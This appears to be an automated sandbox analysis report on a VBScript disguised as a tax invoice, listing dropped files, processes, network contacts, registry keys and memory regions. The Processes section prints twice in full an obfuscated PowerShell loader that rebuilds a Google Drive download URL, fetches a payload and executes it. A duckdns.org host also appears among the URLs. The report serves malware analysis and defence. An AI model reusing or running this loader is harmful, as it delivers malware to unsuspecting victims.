Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
NTS_eTaxInvoice.html.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cusozop1.h1r.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_farvirze.w5m.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5dhknl5.0j1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmegujnc.51n.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Forsvarsundtagelsen.Non
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie
Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If
($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for(
$Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){
. ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E
oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep
WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm
angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x
ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel
oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg
MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon
entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks
mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner
' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable
(Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn
omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu
aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q
ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD
UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r
,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor
BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai
ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc
UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP ogrcK.essoDet,clG lfdTWei hyIndh pObjeke.ebuk]Ordd,:Hjest:SubaqTBaglylGelatsRubin1
B,oa2Nerei ');$Dermoid108=$Rekreeredes[0];$Aalb=(Demissioner 'Hellm$ nbegg odralDentioLnsitbDrumrABlindl Picc:CommoMUdsena
inden,etrauBoardSV,riae pndeRPteleSZo ch=Syntan BeeseAnatfW Knap-Tang oFremsbE samJLukkeERipplc Utalt Sema RadioS omsYFin,eS
CajutGar iET,talm Klum.OsmetNF rskemol atRamni.AeridWClienEGiantB akeeCFnaddl afiriS aineCountNIndgrT urve ');Complimentable
($Aalb);Complimentable (Demissioner 'Unm n$ AandMAprjtaDiscon.igmouRos vsSurgeepolycrKl nisSpi l.NatioH PeaseKolibaProjed
imike.lestr ochls Gulp[ semi$ami,aSBesluaMendicY erpcDe,eah.ammea HuserHaymiosuperfInferaParaprSuperi OplinC,priaCigarcSnavseBehagoBa
liuCl,nksSalut]S veb=San t$ harCP eroo Fingn Oplav JudaeTaxabcAf ket Laici IntivTonetelactol taily acci ');$Bortkaldenes=Demissioner
' Run $KugleM evea SchonSubtruA tens edbeNoctirV.nstsEremi.UdsorDegenpowheatwToldanDescrlPilotoIsltpaSe.undTeor FSh rpiHajerl.ndlie
rais(Sk ll$progrDHypoaeA wesr Ichtm RedioSlgegiBuddhdStor 1Pro u0 Komi8 For ,Supin$KloroTTripii spanl an asSamm.tA likaDisbunFortidSympts
AntikL.mfaoCheunn.halat Sew.r Fas,o F,rsl SennlForlaeTabernForsk)Early ';$Tilstandskontrollen=$Taktreguleringsordning;Complimentable
(Demissioner ' St.a$SagsbgHeterLLin,aOOverlB Ac,tA MonuLFork :RaaensIps,lEaburacCha,uE.amboS Svi,hYtt oeAu okrHyoep= Khar(SlabutReconedialesS
rjtTAccen- SlenPMins A,njurtBuskvHDemor syla$H.nritStil.i DiviL Sel SImpasT orbeAFamleNLa,tidOsteesSlittK CyphO Dec nTilflTColorrFlde
oPushelDangllAposteKont Nmetag)Mith ');while (!$Secesher) {Complimentable (Demissioner 'Besho$W ankgToolmlIndenoDingibStjmaa
PosslKrmme: BldgLMappegUr.tie skvamS xoliSteepdGadenlUncateLal erDiagrsArbej=S.nka$ReduptReletrPreteuKe.neeRredd ') ;Complimentable
$Bortkaldenes;Complimentable (Demissioner 'PositS ConstBaandaA ronrPlummtmax l-RadicSRebuclH,tideNondaeF.odepF rbi Parag4Perki
');Complimentable (Demissioner 'Vates$CentegtokonlT gneoMartibIndkbaRededlC lla:RegniSSt,ike UdskcSmidieForhasHarboh undeeExpatrRetou=
Remu(,luviTKonsteRedidsHypert E.ns-FodtuPSpinaaAfgiftAutomhUnwil Skel $ouchiTFedtei Ko.llSoillsLselatGe iraHolden UdbldForsesP
lotkFo nuo ba ln Eks t HjerrLarkio RentlKvajplIn uleSpec nF rtl)Age s ') ;Complimentable (Demissioner 'Unvex$UnweagDis elemissoSemipbb
odtaSvinglPostd:ThousNMick yDgl nsPlombeMacra= Re r$ Sno.gGrumblUnevao LeucbPartiaRe.mplP ras:C lfoS HalvtlivssmSelvraKo,ypgAarsktLittleChambrDansknPart,e
Fr.p+Frems+Balde% luor$OspheRPiggieind rkArecarS bbre For.e.ersurFolloeAmberd usmoeNonres Tndi.ShoemcRew,ro MultuQua,en m,krtFi,eo
') ;$Dermoid108=$Rekreeredes[$Nyse];}$hanerne=327149;$Whitewashes=31726;Complimentable (Demissioner 'Godke$ Mudrg ChanlSklveoAgorabI
posaKontalKathi: ArmvTNicksyHel.as BrilkSu syl Cas aRedamn Po gdtorqusexophk BranoHurtirDiapatTovreemalacnKo keeVandf Rente=K,ydr
UnmaGOgcoce KonttTelea-v yagC Preeo PennnMur etTrumbeAntipnBour tBog.r .well$S iseTHjtidiKo salBrdtesParcet SkaraMeta nAl
ebd innosImprekGymnaounfe.nStanstSomatra,itho GenmlSereal D,caePbelanpentr ');Complimentable (Demissioner 'Helio$fontegRuskvlEul
goTr,ldbShmooaAboitlA ive:SkmteAL vitfDataovBridaiunshrsTi,skeLedersUrocy F rgl=Strit Kna,e[D mkiSBjensyElaeosDecrot K,ype
B.gsm Defi.An.itCPlejeoRi.honIntervSminkeMet,lrFejlktFrken]Barbo:Symph:BobslFsygepr InduoSkummmUnel BChr saAltersA.reme.asel6Vej
n4PresuS anectGli.trNutidicho en Halvg We d(.nder$Nonc T LgdeyT.igosPeltikZoonulTheataResu,nAlarmd DeodsStrudkUforkobasisrDisset
UforeM,tronLu,eaeIncon)Blunt ');Complimentable (Demissioner ',iern$UdbldgAf nnl zygoo BespbLave,ashal.lstrue:Pe sohKlbenyRevispTranse
Profr LumidMispoeOrdk.l PrstiMallec Grapas.gnecTankeyHausf Bo sa=Garr, Plan[VarmeSandenyAnthrsCherrtS ovbe ChesmBulkl.P.ojeTBalloeT
iloxGavltt Rh.x.Wi dbEFermenfljtecAabenom.rryd mneiPodopnDodecg,kole]Sidew:Carbi:UnwebA s apSNieceCDilatIUngtjIStorm.UdfreGDogmaeSyntatSuli.SGla.ftMondorEmbaciSegganApertgRommy(Fruit$
DemoA Car,fSpectvKommuiMicrosForeseAr.easNedto)Be.ud ');Complimentable (Demissioner 'U.ere$ Afskg AvlslUnmanoK rtebElandaClanslPha,t:Poly,EBullisStigmt
brikhEx rieBalanshaeani Vej,oVilk,gAnnlirA.equa D gep AfbahAptycyAgerb=Arbit$ KanehLeucoy Loo pEuroceRawbor BuksdCryste vehilMargiiBrnebcunentaMomencDafniyMac.o.
eners Fuldu ankebStar sIchortTek tr Solsi ,rcin eohygForby(Elect$CensohTor kaShadfnScapheSlatirBriefnZ,dkueMisap,Mine,$StortWK
lethSt rei HachtinteleBlindw InteaStyrbs F,erhBilggeAarsis Stud)Eng n ');Complimentable $Esthesiography;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie
Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If
($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for(
$Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){
. ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E
oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep
WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm
angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x
ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel
oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg
MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon
entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks
mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner
' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable
(Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn
omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu
aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q
ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD
UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r
,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor
BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai
ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc
UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP ogrcK.essoDet,clG lfdTWei hyIndh pObjeke.ebuk]Ordd,:Hjest:SubaqTBaglylGelatsRubin1
B,oa2Nerei ');$Dermoid108=$Rekreeredes[0];$Aalb=(Demissioner 'Hellm$ nbegg odralDentioLnsitbDrumrABlindl Picc:CommoMUdsena
inden,etrauBoardSV,riae pndeRPteleSZo ch=Syntan BeeseAnatfW Knap-Tang oFremsbE samJLukkeERipplc Utalt Sema RadioS omsYFin,eS
CajutGar iET,talm Klum.OsmetNF rskemol atRamni.AeridWClienEGiantB akeeCFnaddl afiriS aineCountNIndgrT urve ');Complimentable
($Aalb);Complimentable (Demissioner 'Unm n$ AandMAprjtaDiscon.igmouRos vsSurgeepolycrKl nisSpi l.NatioH PeaseKolibaProjed
imike.lestr ochls Gulp[ semi$ami,aSBesluaMendicY erpcDe,eah.ammea HuserHaymiosuperfInferaParaprSuperi OplinC,priaCigarcSnavseBehagoBa
liuCl,nksSalut]S veb=San t$ harCP eroo Fingn Oplav JudaeTaxabcAf ket Laici IntivTonetelactol taily acci ');$Bortkaldenes=Demissioner
' Run $KugleM evea SchonSubtruA tens edbeNoctirV.nstsEremi.UdsorDegenpowheatwToldanDescrlPilotoIsltpaSe.undTeor FSh rpiHajerl.ndlie
rais(Sk ll$progrDHypoaeA wesr Ichtm RedioSlgegiBuddhdStor 1Pro u0 Komi8 For ,Supin$KloroTTripii spanl an asSamm.tA likaDisbunFortidSympts
AntikL.mfaoCheunn.halat Sew.r Fas,o F,rsl SennlForlaeTabernForsk)Early ';$Tilstandskontrollen=$Taktreguleringsordning;Complimentable
(Demissioner ' St.a$SagsbgHeterLLin,aOOverlB Ac,tA MonuLFork :RaaensIps,lEaburacCha,uE.amboS Svi,hYtt oeAu okrHyoep= Khar(SlabutReconedialesS
rjtTAccen- SlenPMins A,njurtBuskvHDemor syla$H.nritStil.i DiviL Sel SImpasT orbeAFamleNLa,tidOsteesSlittK CyphO Dec nTilflTColorrFlde
oPushelDangllAposteKont Nmetag)Mith ');while (!$Secesher) {Complimentable (Demissioner 'Besho$W ankgToolmlIndenoDingibStjmaa
PosslKrmme: BldgLMappegUr.tie skvamS xoliSteepdGadenlUncateLal erDiagrsArbej=S.nka$ReduptReletrPreteuKe.neeRredd ') ;Complimentable
$Bortkaldenes;Complimentable (Demissioner 'PositS ConstBaandaA ronrPlummtmax l-RadicSRebuclH,tideNondaeF.odepF rbi Parag4Perki
');Complimentable (Demissioner 'Vates$CentegtokonlT gneoMartibIndkbaRededlC lla:RegniSSt,ike UdskcSmidieForhasHarboh undeeExpatrRetou=
Remu(,luviTKonsteRedidsHypert E.ns-FodtuPSpinaaAfgiftAutomhUnwil Skel $ouchiTFedtei Ko.llSoillsLselatGe iraHolden UdbldForsesP
lotkFo nuo ba ln Eks t HjerrLarkio RentlKvajplIn uleSpec nF rtl)Age s ') ;Complimentable (Demissioner 'Unvex$UnweagDis elemissoSemipbb
odtaSvinglPostd:ThousNMick yDgl nsPlombeMacra= Re r$ Sno.gGrumblUnevao LeucbPartiaRe.mplP ras:C lfoS HalvtlivssmSelvraKo,ypgAarsktLittleChambrDansknPart,e
Fr.p+Frems+Balde% luor$OspheRPiggieind rkArecarS bbre For.e.ersurFolloeAmberd usmoeNonres Tndi.ShoemcRew,ro MultuQua,en m,krtFi,eo
') ;$Dermoid108=$Rekreeredes[$Nyse];}$hanerne=327149;$Whitewashes=31726;Complimentable (Demissioner 'Godke$ Mudrg ChanlSklveoAgorabI
posaKontalKathi: ArmvTNicksyHel.as BrilkSu syl Cas aRedamn Po gdtorqusexophk BranoHurtirDiapatTovreemalacnKo keeVandf Rente=K,ydr
UnmaGOgcoce KonttTelea-v yagC Preeo PennnMur etTrumbeAntipnBour tBog.r .well$S iseTHjtidiKo salBrdtesParcet SkaraMeta nAl
ebd innosImprekGymnaounfe.nStanstSomatra,itho GenmlSereal D,caePbelanpentr ');Complimentable (Demissioner 'Helio$fontegRuskvlEul
goTr,ldbShmooaAboitlA ive:SkmteAL vitfDataovBridaiunshrsTi,skeLedersUrocy F rgl=Strit Kna,e[D mkiSBjensyElaeosDecrot K,ype
B.gsm Defi.An.itCPlejeoRi.honIntervSminkeMet,lrFejlktFrken]Barbo:Symph:BobslFsygepr InduoSkummmUnel BChr saAltersA.reme.asel6Vej
n4PresuS anectGli.trNutidicho en Halvg We d(.nder$Nonc T LgdeyT.igosPeltikZoonulTheataResu,nAlarmd DeodsStrudkUforkobasisrDisset
UforeM,tronLu,eaeIncon)Blunt ');Complimentable (Demissioner ',iern$UdbldgAf nnl zygoo BespbLave,ashal.lstrue:Pe sohKlbenyRevispTranse
Profr LumidMispoeOrdk.l PrstiMallec Grapas.gnecTankeyHausf Bo sa=Garr, Plan[VarmeSandenyAnthrsCherrtS ovbe ChesmBulkl.P.ojeTBalloeT
iloxGavltt Rh.x.Wi dbEFermenfljtecAabenom.rryd mneiPodopnDodecg,kole]Sidew:Carbi:UnwebA s apSNieceCDilatIUngtjIStorm.UdfreGDogmaeSyntatSuli.SGla.ftMondorEmbaciSegganApertgRommy(Fruit$
DemoA Car,fSpectvKommuiMicrosForeseAr.easNedto)Be.ud ');Complimentable (Demissioner 'U.ere$ Afskg AvlslUnmanoK rtebElandaClanslPha,t:Poly,EBullisStigmt
brikhEx rieBalanshaeani Vej,oVilk,gAnnlirA.equa D gep AfbahAptycyAgerb=Arbit$ KanehLeucoy Loo pEuroceRawbor BuksdCryste vehilMargiiBrnebcunentaMomencDafniyMac.o.
eners Fuldu ankebStar sIchortTek tr Solsi ,rcin eohygForby(Elect$CensohTor kaShadfnScapheSlatirBriefnZ,dkueMisap,Mine,$StortWK
lethSt rei HachtinteleBlindw InteaStyrbs F,erhBilggeAarsis Stud)Eng n ');Complimentable $Esthesiography;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a458386d9.duckdns.org
|
|
||
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://aka.ms/pscore6lBcq
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://drive.usercontent.googhp
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
172.217.18.14
|
||
|
drive.usercontent.google.com
|
142.250.186.33
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.217.16.206
|
unknown
|
United States
|
||
|
172.217.18.14
|
drive.google.com
|
United States
|
||
|
142.250.186.33
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
88EE000
|
direct allocation
|
page execute and read and write
|
|
|
|
1D31006D000
|
trusted library allocation
|
page read and write
|
|
|
|
64E1000
|
heap
|
page read and write
|
|
|
|
8060000
|
direct allocation
|
page execute and read and write
|
|
|
|
5324000
|
trusted library allocation
|
page read and write
|
|
|
|
4BDCA7E000
|
stack
|
page read and write
|
||
|
1D36D630000
|
heap
|
page read and write
|
||
|
8780000
|
direct allocation
|
page execute and read and write
|
||
|
7FF8484E4000
|
trusted library allocation
|
page read and write
|
||
|
4BDC5FE000
|
stack
|
page read and write
|
||
|
A6EE000
|
direct allocation
|
page execute and read and write
|
||
|
657E000
|
stack
|
page read and write
|
||
|
4BAF000
|
trusted library allocation
|
page read and write
|
||
|
1D3102E8000
|
trusted library allocation
|
page read and write
|
||
|
6A90000
|
heap
|
page read and write
|
||
|
8070000
|
trusted library allocation
|
page read and write
|
||
|
1D301D95000
|
trusted library allocation
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
B4EB1FE000
|
stack
|
page read and write
|
||
|
1D301DA4000
|
trusted library allocation
|
page read and write
|
||
|
1D36B4D5000
|
heap
|
page read and write
|
||
|
4BDD6CD000
|
stack
|
page read and write
|
||
|
51DE000
|
remote allocation
|
page execute and read and write
|
||
|
7D8C000
|
stack
|
page read and write
|
||
|
25A7023D000
|
heap
|
page read and write
|
||
|
697000
|
heap
|
page read and write
|
||
|
6C8F000
|
heap
|
page read and write
|
||
|
7FF848820000
|
trusted library allocation
|
page read and write
|
||
|
1D36CDE0000
|
heap
|
page read and write
|
||
|
21D2F000
|
stack
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
7D4E000
|
stack
|
page read and write
|
||
|
80F0000
|
direct allocation
|
page read and write
|
||
|
6BD8000
|
heap
|
page read and write
|
||
|
7A6D000
|
stack
|
page read and write
|
||
|
64FE000
|
stack
|
page read and write
|
||
|
7FF8486E0000
|
trusted library allocation
|
page read and write
|
||
|
6A1000
|
heap
|
page read and write
|
||
|
1D36D9E0000
|
heap
|
page read and write
|
||
|
25A6FFDA000
|
heap
|
page read and write
|
||
|
25A71F38000
|
heap
|
page read and write
|
||
|
4BDC183000
|
stack
|
page read and write
|
||
|
7FF8484FB000
|
trusted library allocation
|
page read and write
|
||
|
6FA0000
|
trusted library allocation
|
page read and write
|
||
|
7DD2000
|
heap
|
page read and write
|
||
|
1D36B420000
|
heap
|
page read and write
|
||
|
1D36D530000
|
heap
|
page read and write
|
||
|
6740000
|
direct allocation
|
page read and write
|
||
|
25A7202A000
|
heap
|
page read and write
|
||
|
2B3D000
|
stack
|
page read and write
|
||
|
7FF848830000
|
trusted library allocation
|
page read and write
|
||
|
42B8000
|
trusted library allocation
|
page read and write
|
||
|
1D301E2B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848750000
|
trusted library allocation
|
page read and write
|
||
|
7CAC000
|
stack
|
page read and write
|
||
|
1D300BAB000
|
trusted library allocation
|
page read and write
|
||
|
7E5E000
|
stack
|
page read and write
|
||
|
B4EB8FE000
|
stack
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
21C0D000
|
stack
|
page read and write
|
||
|
1D36D553000
|
heap
|
page read and write
|
||
|
600000
|
trusted library section
|
page read and write
|
||
|
7FF8484F0000
|
trusted library allocation
|
page read and write
|
||
|
25A71FDF000
|
heap
|
page read and write
|
||
|
7FF8487E0000
|
trusted library allocation
|
page read and write
|
||
|
25A71EE4000
|
heap
|
page read and write
|
||
|
6770000
|
direct allocation
|
page read and write
|
||
|
7FF8487C0000
|
trusted library allocation
|
page read and write
|
||
|
25A72044000
|
heap
|
page read and write
|
||
|
1D36B4A7000
|
heap
|
page read and write
|
||
|
1D30048D000
|
trusted library allocation
|
page read and write
|
||
|
21BBF000
|
stack
|
page read and write
|
||
|
B4EB4FE000
|
stack
|
page read and write
|
||
|
4BDC7FE000
|
stack
|
page read and write
|
||
|
7FF848740000
|
trusted library allocation
|
page read and write
|
||
|
4BDCC7C000
|
stack
|
page read and write
|
||
|
1D3004A6000
|
trusted library allocation
|
page read and write
|
||
|
7B1B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848600000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BDC57E000
|
stack
|
page read and write
|
||
|
25A71FEA000
|
heap
|
page read and write
|
||
|
5BDE000
|
remote allocation
|
page execute and read and write
|
||
|
25A70017000
|
heap
|
page read and write
|
||
|
653E000
|
stack
|
page read and write
|
||
|
219FF000
|
stack
|
page read and write
|
||
|
25A71FE6000
|
heap
|
page read and write
|
||
|
80A0000
|
direct allocation
|
page read and write
|
||
|
29E0000
|
heap
|
page execute and read and write
|
||
|
2969000
|
trusted library allocation
|
page read and write
|
||
|
25A71EE4000
|
heap
|
page read and write
|
||
|
